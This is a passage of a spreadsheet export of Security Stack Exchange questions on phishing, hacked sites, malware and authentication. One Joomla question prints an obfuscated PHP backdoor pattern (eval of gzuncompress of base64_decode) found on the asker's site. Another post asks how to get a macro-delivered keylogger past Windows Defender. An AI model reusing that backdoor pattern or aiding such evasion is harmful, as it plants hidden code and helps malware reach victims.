 &lt;p&gt;2: Is it really possible to extract the private key using a padding oracle, or does the padding oracle just allow arbitary message decryption? The 2 linked articles are ambigious in that regard.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;rsa&gt;&lt;pkcs1&gt;</t>
  </si>
  <si>
    <t>Website online assistant asked for my password</t>
  </si>
  <si>
    <t>&lt;p&gt;Sorry if this isn't the right place for this..&lt;/p&gt;
 &lt;p&gt;I recently joined an online gambling website and clicked on live assist. To verify my identity they asked for my username and password. I did not give it to them. I am not really worried about it being a phishing attempt, but my main concern is that he can see my password in plain text. Is this normal procedure/okay/safe? I use a variation of the same password for every website that would be pretty easy to figure out if one tried, because i thought no human would ever see them and everything is supposed to be store encrypted. &lt;/p&gt;
 &lt;p&gt;I did some research before joining and the website has a good reputation but this just gets my (admittedly ignorant) spidey-sense flashing. This website now has a grand of my $ and is linked to my bank account and has me a bit worried.&lt;/p&gt;
 &lt;p&gt;Thanks for any wisdom you can share.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;</t>
  </si>
  <si>
    <t>How is this website redirect working?</t>
  </si>
  <si>
    <t>&lt;p&gt;Someone sent me a URL via WhatsApp (&lt;code&gt;httpx://cadburys-prizes[.]com&lt;/code&gt;) that allegedly lets me claim a free box of chocolates. Obviously this is fake and I've seen similar websites before.&lt;/p&gt;
 &lt;p&gt;If I view the URL on my phone I end up at &lt;code&gt;httpx://cadburys-prizes[dot]com/#forward&lt;/code&gt; where I'm prompted to answer some questions and then spam my WA contacts with further messages.&lt;/p&gt;
 &lt;p&gt;Viewing the source code for the page (by wget'ting it) , I can see a redirect to a bit.ly address. When I open the &lt;code&gt;cadburys-prizes[.]com&lt;/code&gt; url on a (sanitized, virtual) desktop browser I get redirected to the bit.ly address which, judging from the URL, is a fake tech support site (the content is getting blocked by my network defences but I can imagine the scene). &lt;/p&gt;
 &lt;p&gt;What I don't understand is where the survey that shows on iPhone comes from? There is nothing I can see in the source of that page. Is it possible for an invisible proxy to be presenting a different index.html based on the user agent string? I did try to wget the page with mobile Safari UA but got the same result as without it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are subdomains a cure for phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;Seeing as phishing is getting more popular and users are becoming less concerned about security, I am trying to come up with a solution for a new site of mine that can stop phishers. For instance, any one can create a new site that looks exactly like Gmail and phish users to it in order to obtain their UN/PW.&lt;/p&gt;
 &lt;p&gt;However, what if we made the user pick their subdomain at registration? They can only login on this subdomain, ie. mysubdomainchoice.domain.com. Now when the phisher gets the credentials from an innocent user, he no longer knows where he can apply them. After several invalid login attempts we can safely lockout the user and have them change their un/pw if they come to their correct subdomain and answer their security questions.&lt;/p&gt;
 &lt;p&gt;Is this a valid way of defending against phishing and have others thought of this before?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;authentication&gt;&lt;phishing&gt;&lt;sub-domain&gt;</t>
  </si>
  <si>
    <t>Phishing emails - What do I look for?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to be able to spot a phishing email. What are the things to check when investigating and doing forensics on one? &lt;/p&gt;
 &lt;p&gt;There are some things I know to look for already but I want to get moer technical with it. 
 Here are some things I already look for:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;verify the sender (actually looking at the senders email rather than just the displayed name)&lt;/li&gt;
 &lt;li&gt;hover over the link in the email and look at the URL address listed at the bottom. If the URL looks suspicious, dont click it. I almost never click links in my email anyways.&lt;/li&gt;
 &lt;li&gt;only attached .txt files are safe, otherwise I do not download anything attached to the email unless I was expecting it and I verified it is from the person I knew it was supposed to come from. Found a good write up here on how to check attachments &lt;a href="https://security.stackexchange.com/a/32931/22691"&gt;https://security.stackexchange.com/a/32931/22691&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;I believe there is a way to check the header of the email. Checking the domain name and IP address in the ‚ÄúReceived‚Äù field which will validate if it was spoofed by a email spoofing site or someone with a suspicious email address. If it is just the IP address you can check it using a site like whois.com.&lt;/li&gt;
 &lt;li&gt;Also checking the validation results in the Received-SPF field in the header. Mail sent from permitted servers will show up as ‚ÄúPass‚Äù in the Received-SPF field, which is a very strong indicator that the email is legitimate. If the results show ‚ÄúFail‚Äù or ‚ÄúSoftfail‚Äù, that‚Äôs a sign the email may be spoofed, though it‚Äôs not 100% certain since some domains don‚Äôt keep their SPF records up to date, resulting in validation failures.&lt;/li&gt;
 &lt;li&gt;Look out for how the email was written. If it is misspelled a lot, similar spellings to what you would expect making it look suspicious, sounds urgent or threatning, asking for any personal data like passwords/social security numbers/etc&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Is there anything that I am missing? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;social-engineering&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Hack: anymonous URL on my Joomla Website[Resolve]</t>
  </si>
  <si>
    <t>&lt;p&gt;My website has been hacked again. There are many foreign URLs such as &lt;a href="http://www.mentarimedia.com/stella-maris-college-chennai-application-form-_xuatn" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I've checked the database and there is nothing strange in my database. Does anyone know what kind of hack attack is like this?&lt;/p&gt;
 &lt;p&gt;Then I have to execute all files with &lt;code&gt;exit ();&lt;/code&gt; and I quit "on /libraries/import.legacy.php".&lt;/p&gt;
 &lt;p&gt;If I give exit () under&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php');
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;the result is that my website is still able to walk, but with the strange link.&lt;/p&gt;
 &lt;p&gt;But if I give &lt;code&gt;exit()&lt;/code&gt; &lt;em&gt;in&lt;/em&gt; the above&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php')
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The result is that the website stops.&lt;/p&gt;
 &lt;p&gt;this my error log&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Software: Joomla Platform 12.2.0 Stable [ Neil Armstrong ] 21-September-2012 00:00 GMT
 #Fields: datetime priority category message
 2014-02-07T09:50:19+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-02-20T02:46:05+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-02-20T19:49:05+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-02-25T14:25:09+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-02T09:51:23+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-03T03:47:15+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-04T09:36:38+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-04T09:36:58+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-05T04:14:22+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-05T12:27:10+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-09T01:17:12+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-11T15:03:30+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 2014-03-11T15:03:38+00:00 INFO joomlafailure Username and password do not match or you do not have an account yet.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;br /&gt;
 i found this.. Resolve..&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$word = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";
 $wp1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";
 eval/**test*/(/**test*/$wp1/**test*/(/**test*/$word('Code)));
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thank you all&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;php&gt;&lt;phishing&gt;&lt;vulnerability&gt;&lt;joomla&gt;</t>
  </si>
  <si>
    <t>Bypassing Windows Defender VBA custom code</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently written a simple keylogger using classic DLL-injection technique. I wanted to simulate a real phishing attack where the user opens an Office document with macros and by enabling them he downloads and runs my keylogger. While the keylogger itself is not being recognized as a thread, the VBA script is.&lt;/p&gt;
 &lt;p&gt;I've searched for a similar question and I've only found questions about how to obfuscate metasploit/empire payloads. I've even tried some of them, but they all got recognized as a threat (I've used msfvenom shinkata as encoder).&lt;/p&gt;
 &lt;p&gt;I don't want to use any existing tools. I'd like to learn how Windows Defender recognizes that piece of VBA script as malicious. I've read that it uses both signature-based scanning along with runtime execution analysis. All bypassing techniques which I've found on internet tried to obfuscate code which in my understanding can only try to bypass the signature scanning part.&lt;/p&gt;
 &lt;p&gt;Environment: default Windows 10 configuration&lt;/p&gt;
 &lt;p&gt;Also if any of you know a way to force Windows Defender to tell me why it recognized my code as a threat (for example "use of unsafe function", etc) it would be super helpful!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;windows&gt;&lt;antivirus&gt;&lt;antimalware&gt;&lt;quarantine&gt;</t>
  </si>
  <si>
    <t>Corporate penetration testing/phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;If a company employs a security company to 'hack' into their systems and agrees to allow this security company to send fake phishing emails to employees...&lt;/p&gt;
 &lt;p&gt;...is that company (or the security company) legally liable if - in the process of falling for one of the phishing emails - an employee enters personal social network credentials which are then used (perhaps via logging into non-company systems) to gain entry to the company's (client's) systems?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;audit&gt;&lt;phishing&gt;&lt;corporate-policy&gt;</t>
  </si>
  <si>
    <t>What are the possible consequences of clicking a link in a phishing mail?</t>
  </si>
  <si>
    <t>&lt;p&gt;I clicked on a Google Slides spoof link in an email in Yahoo mail in a Chrome browser.
 As soon as I had clicked it I realized my mistake. I did not enter any password or give away info.
 What are the possible consequences of such an attack? How do I proceed from here?
 Are there logs I can inspect to find out what the code on that webpage did?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why hasn't the one-click attack taken over the world?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a follow-up question related to &lt;a href="https://security.stackexchange.com/questions/195100/is-single-click-phishing-possible/195119#195119"&gt;Is single-click phishing possible?&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;If such a convenient attack is possible, I assume everyone on the internet should already be hacked. Why hasn't that happened?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;phishing&gt;&lt;drive-by-download&gt;</t>
  </si>
  <si>
    <t>Unexpected phishing attempt by SMS</t>
  </si>
  <si>
    <t>&lt;p&gt;I just received this text message (&lt;a href="https://i.imgur.com/0ULVDTT.jpg" rel="nofollow noreferrer"&gt;screenshot&lt;/a&gt;), which claims to be from the national postal service, informing me that I have a package waiting for me. 
 I have a user account on their website, so them having my cell phone number is not a surprise. But I didn't expect them to use the bit.ly service, and that triggered my first suspicion.&lt;/p&gt;
 &lt;p&gt;To be safe, I loaded the actual link (&lt;a href="http://bit.ly/1TSvBPm" rel="nofollow noreferrer"&gt;http://bit.ly/1TSvBPm&lt;/a&gt;) in a VM on my desktop pc. It triggers the download of an Android app (an APK file), and when I look at what that file contains I see credit card logos and other highly suspicious things. This is definitely not a real notification from the actual postal service!&lt;/p&gt;
 &lt;p&gt;I'm posting here to get the opinion of more experienced users. I'm mostly interested in hearing what I should do now:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I already submitted this to the postal service with the request that they investigate.&lt;/li&gt;
 &lt;li&gt;What else should I do?&lt;/li&gt;
 &lt;li&gt;How can I avoid receiving stuff like this on my phone? Obviously somebody else than the postal service has my cell number, and knows it's an Android phone.&lt;/li&gt;
 &lt;li&gt;I guess I will have to warn other people about this risk. I have pretty gullible relatives.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Thanks in advance for your feedback!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>How is the "WannaCry" Malware spreading and how should users defend themselves from it?</t>
  </si>
  <si>
    <t>&lt;p&gt;There's a new strain of attacks which is affecting a lot of systems around the world (including the NHS in the UK and Telefonica in Spain) which is being called &lt;a href="https://www.grahamcluley.com/wannacry-ransomware-hits-systems-worldwide/" rel="noreferrer"&gt;"WannaCry"&lt;/a&gt; amongst other names.&lt;/p&gt;
 &lt;p&gt;It seems to be a both a standard phishing/ransomware attack but it's also spreading like a worm once it gets into a target network.&lt;/p&gt;
 &lt;p&gt;How is this malware compromising people's systems and what's the best way for people to protect themselves from this attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;ransomware&gt;&lt;wannacry&gt;</t>
  </si>
  <si>
    <t>BlackEnergy2 vs. BlackEnergy3: Which one targeted HMIs?</t>
  </si>
  <si>
    <t>&lt;p&gt;Various reports have been published that analyze BlackEnergy2 and BlackEnergy3 in-depth. However, there seems to be discrepancies regarding the malware delivery phase, i.e., initial exploitation.&lt;/p&gt;
 &lt;p&gt;The &lt;a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" rel="nofollow noreferrer"&gt;CrashOverride report&lt;/a&gt; published by Dragos describes the &lt;strong&gt;BlackEnergy2&lt;/strong&gt; malware as follows:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This ICS tailored malware contained exploits for specific types of HMI
  applications including Siemens SIMATIC, GE CIMPLICITY, and Advantech
  WebAccess. BLACKENERGY 2 was a smart approach by the adversaries to
  target internet connected HMIs.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The &lt;a href="https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01B" rel="nofollow noreferrer"&gt;ICS-ALERT-14-281-01E&lt;/a&gt; alert issued by ICS-CERT regarding &lt;strong&gt;BlackEnegery3&lt;/strong&gt; seems to confirm this:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;In a departure from the ICS product vulnerabilities used to deliver the BE2 malware, in this case the infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word) attachment.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However, there are various sources that indicate that &lt;strong&gt;BlackEnergy3&lt;/strong&gt; includes ICS-specific exploits targeting HMIs(, instead of &lt;strong&gt;BlackEnergy2&lt;/strong&gt;).&lt;/p&gt;
 &lt;p&gt;For example:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://cyberx-labs.com/resources/blackenergy-report/" rel="nofollow noreferrer"&gt;CyberX&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The main attack vector observed was infection of
  Human-Machine-Interface (HMI) machines in ICS networks. These machines
  provide a user interface for interacting and controlling industrial
  networks. According to the alert issued by ICS-CERT, various vendors
  were targeted, including GE CIMPLICITY, Advantech/Broadwin WebAccess,
  and Siemens WinCC.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=2&amp;amp;ved=2ahUKEwig3sWpxMDfAhXNXRUIHWPvBWkQFjABegQICBAC&amp;amp;url=https%3A%2F%2Fitrust.sutd.edu.sg%2Fwp-content%2Fuploads%2Fsites%2F3%2F2016%2F10%2Fitrust-analysis-blackenergy.pdf&amp;amp;usg=AOvVaw3OxphsjYPGJGdJxFtVs0dW" rel="nofollow noreferrer"&gt;iTrust&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;According to [3], all BlackEnergy3 malware used for targeted attacks
  infect the Human-Machine-Interface (HMI) workstations in ICS plant
  networks.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://pure.qub.ac.uk/portal/files/86558342/Threat_Analysis_of_BlackEnergy_Malware_for_Synchrophasor_based_Real_time_Control_and_Monitoring_in_Smart_Grid.pdf" rel="nofollow noreferrer"&gt;Khan et al.&lt;/a&gt;:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;BE3 was also found scanning the internet for a specific HMI, the GE
  Intelligent Platforms HMI/SCADA - CIMPLICITY. The HMI was known to
  have a directory traversal vulnerability in CimWebServer.exe (the
  WebView component) which allows remote attackers to execute arbitrary
  code via a crafted message to TCP port 10212, (ZDI-CAN-1623).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;What am I missing here? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;exploit&gt;&lt;scada&gt;</t>
  </si>
  <si>
    <t>User accessed Phishing link but didn't provide the credential but got hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of my colleagues received a phishing email in which he clicked on a link. The domain (www.phishing-link.biz) redirected to adfx.xxx.edu which does look like adfs authentication page.&lt;/p&gt;
 &lt;p&gt;Colleague restated that he did not provide his user name and credentials but closed the window immediately. But after several hours later his account got compromised and huge amount of spam emails were flowing out.&lt;/p&gt;
 &lt;p&gt;Without providing any information, is there any way the hackers get the info (like session hijacking). 
 From host level, how can we see that the user has not provided credentials. Is there any tool which can assist me in getting info?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;forensics&gt;&lt;phishing&gt;&lt;browser-hijacking&gt;</t>
  </si>
  <si>
    <t>Find Frequency of Phishing Attacks on Websites</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to do some comparison based on frequency of phishing attacks on different sites. &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.phishtank.com/target_search.php" rel="nofollow noreferrer"&gt;Phishtank&lt;/a&gt; lists phishing attack against target websites, but looking at the unknown target data available on phishtank it seems that targets were identified for only a fraction of the attacks. Also, since data is based on user reports only, it can not be a reliable source for attack frequency.&lt;/p&gt;
 &lt;p&gt;Now I have two questions. &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Is there any other source which keeps a track of phishing attacks on different sites?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What would be the easiest way to identify unknown targets from phishtank? I can do that manually since with most of the valid reports there is a screenshot attached which usually has the logo/name of target sites. What would be the best OCR tool to use for this?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Social engineering attacks terminology</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's suppose that a hacker send an email containing a Word document with a malicious macro to a sysadmin.
 Does this attack fall under the category of spear phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;social-engineering&gt;&lt;terminology&gt;</t>
  </si>
  <si>
    <t>Report an email address being used by a phisher</t>
  </si>
  <si>
    <t>&lt;p&gt;A close friend fell for a phishing scam earlier today. His account's all squared up now, but I decided to do a bit of investigation.&lt;/p&gt;
 &lt;p&gt;The website he fell for was a very poor imitation of a Remax site hosted on what appears to be a compromised domain. The email address that the captured passwords were being sent to is plainly obvious in the site's script. It's a GMail address, and given the recency of attacks I'd say it is still actively being used to harvest logins.&lt;/p&gt;
 &lt;p&gt;So, armed with that information, I would like to have the account taken down to prevent the (probable script kiddie) from inflicting any more damage. What's the best way to report a suspected phisher's email address?&lt;/p&gt;
 &lt;p&gt;I am aware that the email address may (a) belong to a legitimate user who is unaware that it is being used nefariously, or (b) be a very temporary account that is simply used to collect addresses. So I am not about to do anything stupid to the account itself, nor am I going to attempt to contact it. I am simply wondering if anyone has any advice, or if I should just forget about it (though I do wish to prevent this unfortunate thing from happening to others).&lt;/p&gt;</t>
  </si>
  <si>
    <t>I caught myself in the middle of a phishing scam</t>
  </si>
  <si>
    <t>&lt;p&gt;I got caught up in a phishing scam where I conducted an automated interview with emails that appeared legitimate from real people within my college.&lt;/p&gt;
 &lt;p&gt;I did respond to multiple emails and the only personal information I provided was my email (which they had), my name (which they had), my physical address and my cell phone.&lt;/p&gt;
 &lt;p&gt;I am not sure any of this is something they couldn't locate anyway. I realized it was a scam when they sent me money to deposit to my account right away for equipment I needed to purchase for the job which they had me look up using specific names and model numbers.&lt;/p&gt;
 &lt;p&gt;Once I provided the total to purchase the equipment, they sent me a check. I did not download the document but I did open view it in the gmail browser.&lt;/p&gt;
 &lt;p&gt;My question is do I need to be worried about anything?&lt;/p&gt;
 &lt;p&gt;I already reported it as phishing in gmail and to my university. I've also run the virus scan on my computer. I changed my google account password. I am not tech savvy and not incredibly educated on this matter so I wanted some opinions. Any help is appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Is this phishing? How can I be sure? And what can be gained?</t>
  </si>
  <si>
    <t>&lt;p&gt;Yesterday I received an email that I assumed/hoped was legitimately from a prospective employer that I interviewed with several weeks ago. The timing of the email couldn't have made more sense as they said upon leaving the interview that I should hear back in two to three weeks. Yesterday was exactly three weeks and a day. The email address appeared authentic as it contained the domain name of the company, but the user threw me off (Resumes1@) as I hadn't received any correspondence from this address previously. &lt;/p&gt;
 &lt;p&gt;The email didn't contain any request to sign into anything or ask for personal information, but it did have a link to the original job posting on a recruiter website that also appeared to be legit (hovering over the link produced the same https address in the lower part of the browser window). My suspicion was raised when the email signature contained no phone number, email address link, or company website link and was simply from "company name, Human Resources Department". I did "show original" to view the header info and noticed a three hour delay from the time the message was sent which is also very suspicious, right?&lt;/p&gt;
 &lt;p&gt;Does anyone have any other tests or verifiers to determine if this is truly a phishing attempt? If it is, what can really be gained by merely replying that I was still interested in the position (the only question/request they had of me was if I was still interested and when I was free to discuss further)? Any insights would be greatly appreciated. :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Is it the responsibility of a certificate authority to ensure an SSL is not used for nefarious purposes?</t>
  </si>
  <si>
    <t>&lt;p&gt;I read this in the news recently&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Let's Encrypt has issued 15,000 SSL certificates to PayPal phishing
  sites (Security experts call on firm to refuse certificates for
  domains containing popular brand names)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://www.theinquirer.net/inquirer/news/3007326/lets-encrypt-has-issued-15-000-ssl-certificates-to-paypal-phishing-sites" rel="noreferrer"&gt;https://www.theinquirer.net/inquirer/news/3007326/lets-encrypt-has-issued-15-000-ssl-certificates-to-paypal-phishing-sites&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I'm aware that HTTPS doesn't necessarily indicate a site you can trust, only that the connection is secure. However, does the issuer have a responsibility either legal and/or moral to police how it's certificates are used?&lt;/p&gt;
 &lt;p&gt;Is it the responsibility of a certificate authority to ensure an SSL is not used for nefarious purposes?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificate-authority&gt;&lt;letsencrypt&gt;</t>
  </si>
  <si>
    <t>Wordpress blog hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;There is a Wordpress blog running on Wordpress 4.0. Anyone having the company webmail can signup to the blog using their Google+ account and submit blog posts. Once posted they will be sent to some moderators and once it is reviewed moderator can post it on the blog. Whenever anew blog post is submitted for review all the moderators will receive a mail saying to review the post. &lt;/p&gt;
 &lt;p&gt;Now the problem: The moderators are receiving spam mails. Mail says that &lt;strong&gt;there is a new blog post to be reviewed. To review goto this link.&lt;/strong&gt; The link is a normal link. Nothing seems fishy. But the author details are interesting. The authors are not members of the organization and hence they can't create blog posts. So that I cant think of this as a simple spamming trick. How such moderator mails are getting generated?&lt;/p&gt;
 &lt;p&gt;The authors had an email addresses like name@h.maybebest.com and name@nokiamail.com. What am I supposed to do? Am I hacked?&lt;/p&gt;
 &lt;h2&gt;EDIT&lt;/h2&gt;
 &lt;p&gt;The emails are being received from registered mail server and the link looks like a normal edit blog post link. But since there are no such real blog post it redirects to the blogs homepage.&lt;/p&gt;
 &lt;p&gt;Recently I have deleted all the unwanted users from the website and watched the new users carefully. Within 4 days new spam users are getting registered to the site. Around 100 users were registered in 4 days. &lt;/p&gt;
 &lt;p&gt;I have the &lt;code&gt;New user registration&lt;/code&gt; feature disabled. Still how this happens?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>how to back track a phishing attach? (without being infected)</t>
  </si>
  <si>
    <t>&lt;p&gt;This morning i received this funky looking email from Cerys Evans about a private message he sent my way. First and foremost I want to mention the lack of design talents this attack employed and imagination. The member id of 16666 was immediately suspicious.&lt;/p&gt;
 &lt;p&gt;here is what I did to backtrack the attack.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/8g6Py.png" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>why does google.com redirect if URL contains /amp followed by a schemeless domain name and optional resource?</t>
  </si>
  <si>
    <t>&lt;p&gt;Google recently announced a 'quiz' - more of a tutorial - on identifying phishing email: &lt;a href="https://phishingquiz.withgoogle.com" rel="nofollow noreferrer"&gt;https://phishingquiz.withgoogle.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It includes a sample URL: &lt;code&gt;https://google.com/amp/tinyurl.com/y7u8ewlr&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;When followed this is converted into: &lt;code&gt;https://www.google.com/url?q=http://tinyurl.com/y7u8ewlr&lt;/code&gt; and a Redirect Notice page is shown with this content:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;The page you were on is trying to send you to http://tiny url.com/y7u8ewlr.
 If you do not want to visit that page, you can return to the previous page.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Following tinyurl link takes you to a Jigsaw page - Jigsaw and google seem to have cooperated in producing this quiz.&lt;/p&gt;
 &lt;p&gt;Putting in any schemeless domain name and optional resources (eg. ibm.com) work as well. &lt;a href="https://www.google.com/amp/ibm.com" rel="nofollow noreferrer"&gt;https://www.google.com/amp/ibm.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Why might google.com perform these redirections?
 Are they a security risk (as they can make any URL appear to be from google)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>Phishing email from a contact</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email from what looked like a friend, it had a suspicious link I inspected the email address and saw that the username was spot on but the domain name was totally different. I also put the link through a suspicious link checker and it came through as such. The username is quite a unique one I'm very suspicious as it feels like a personal attack. That said I don't how these phishing people operate so am asking for your thoughts&lt;/p&gt;</t>
  </si>
  <si>
    <t>What if the Google account login screen is spoofed</t>
  </si>
  <si>
    <t>&lt;p&gt;I am talking about the apps that allow using my google account for login. Nothing against Postman, just using its login screen for example - &lt;a href="https://i.stack.imgur.com/D6yEH.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/D6yEH.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My concern is that an app could be spoofing this whole screen to steal my credentials. Is 2FA/MFA good protection in this case? Is there any way to tell if this screen is not spoofed?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;phishing&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>Is detecting if an email has an account considered a vulnerability with AWS cognito?</t>
  </si>
  <si>
    <t>&lt;p&gt;Am doing a pen test on a client system using AWS Cognito and userpools for authentication using the client side SDK provided by AWS.&lt;/p&gt;
 &lt;p&gt;during the forget password flow, I noticed that Cognito request returns &lt;code&gt;400&lt;/code&gt; with a payload of &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;__type UserNotFoundException
 message Username/client id combination not found. 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and &lt;code&gt;200&lt;/code&gt; when a user is found&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;CodeDeliveryDetails {}
 AttributeName email
 DeliveryMedium EMAIL
 Destination j***@g***.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is this considered a vulnerability? It seems to be for me. Its kinda a leak of information. When anyone can check if an email has an account with my app by calling this url. &lt;/p&gt;
 &lt;p&gt;Another attack vector would be brute forcing against known emails for a list of users on the app for marketing or phishing purposes.&lt;/p&gt;
 &lt;p&gt;ideally for this flow you would want Cognito to return 200 regardless of if the email exist or not.&lt;/p&gt;
 &lt;p&gt;I know what is considered a vulnerability is never black and white but this seems to be an issue for me given AWS is so big and trusted. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;email&gt;&lt;aws&gt;&lt;password-reset&gt;&lt;cognito&gt;</t>
  </si>
  <si>
    <t>Should usernames be kept secret?</t>
  </si>
  <si>
    <t>&lt;p&gt;Help me settle an discussion among colleagues and guide future design:&lt;/p&gt;
 &lt;p&gt;Even in a high impact scenario: e.g. protecting payment application or government gateway but in an Internet accessible application&lt;/p&gt;
 &lt;p&gt;Is it worthwhile implementing any of the following (or other) measures to protect a username:&lt;/p&gt;
 &lt;ul&gt;
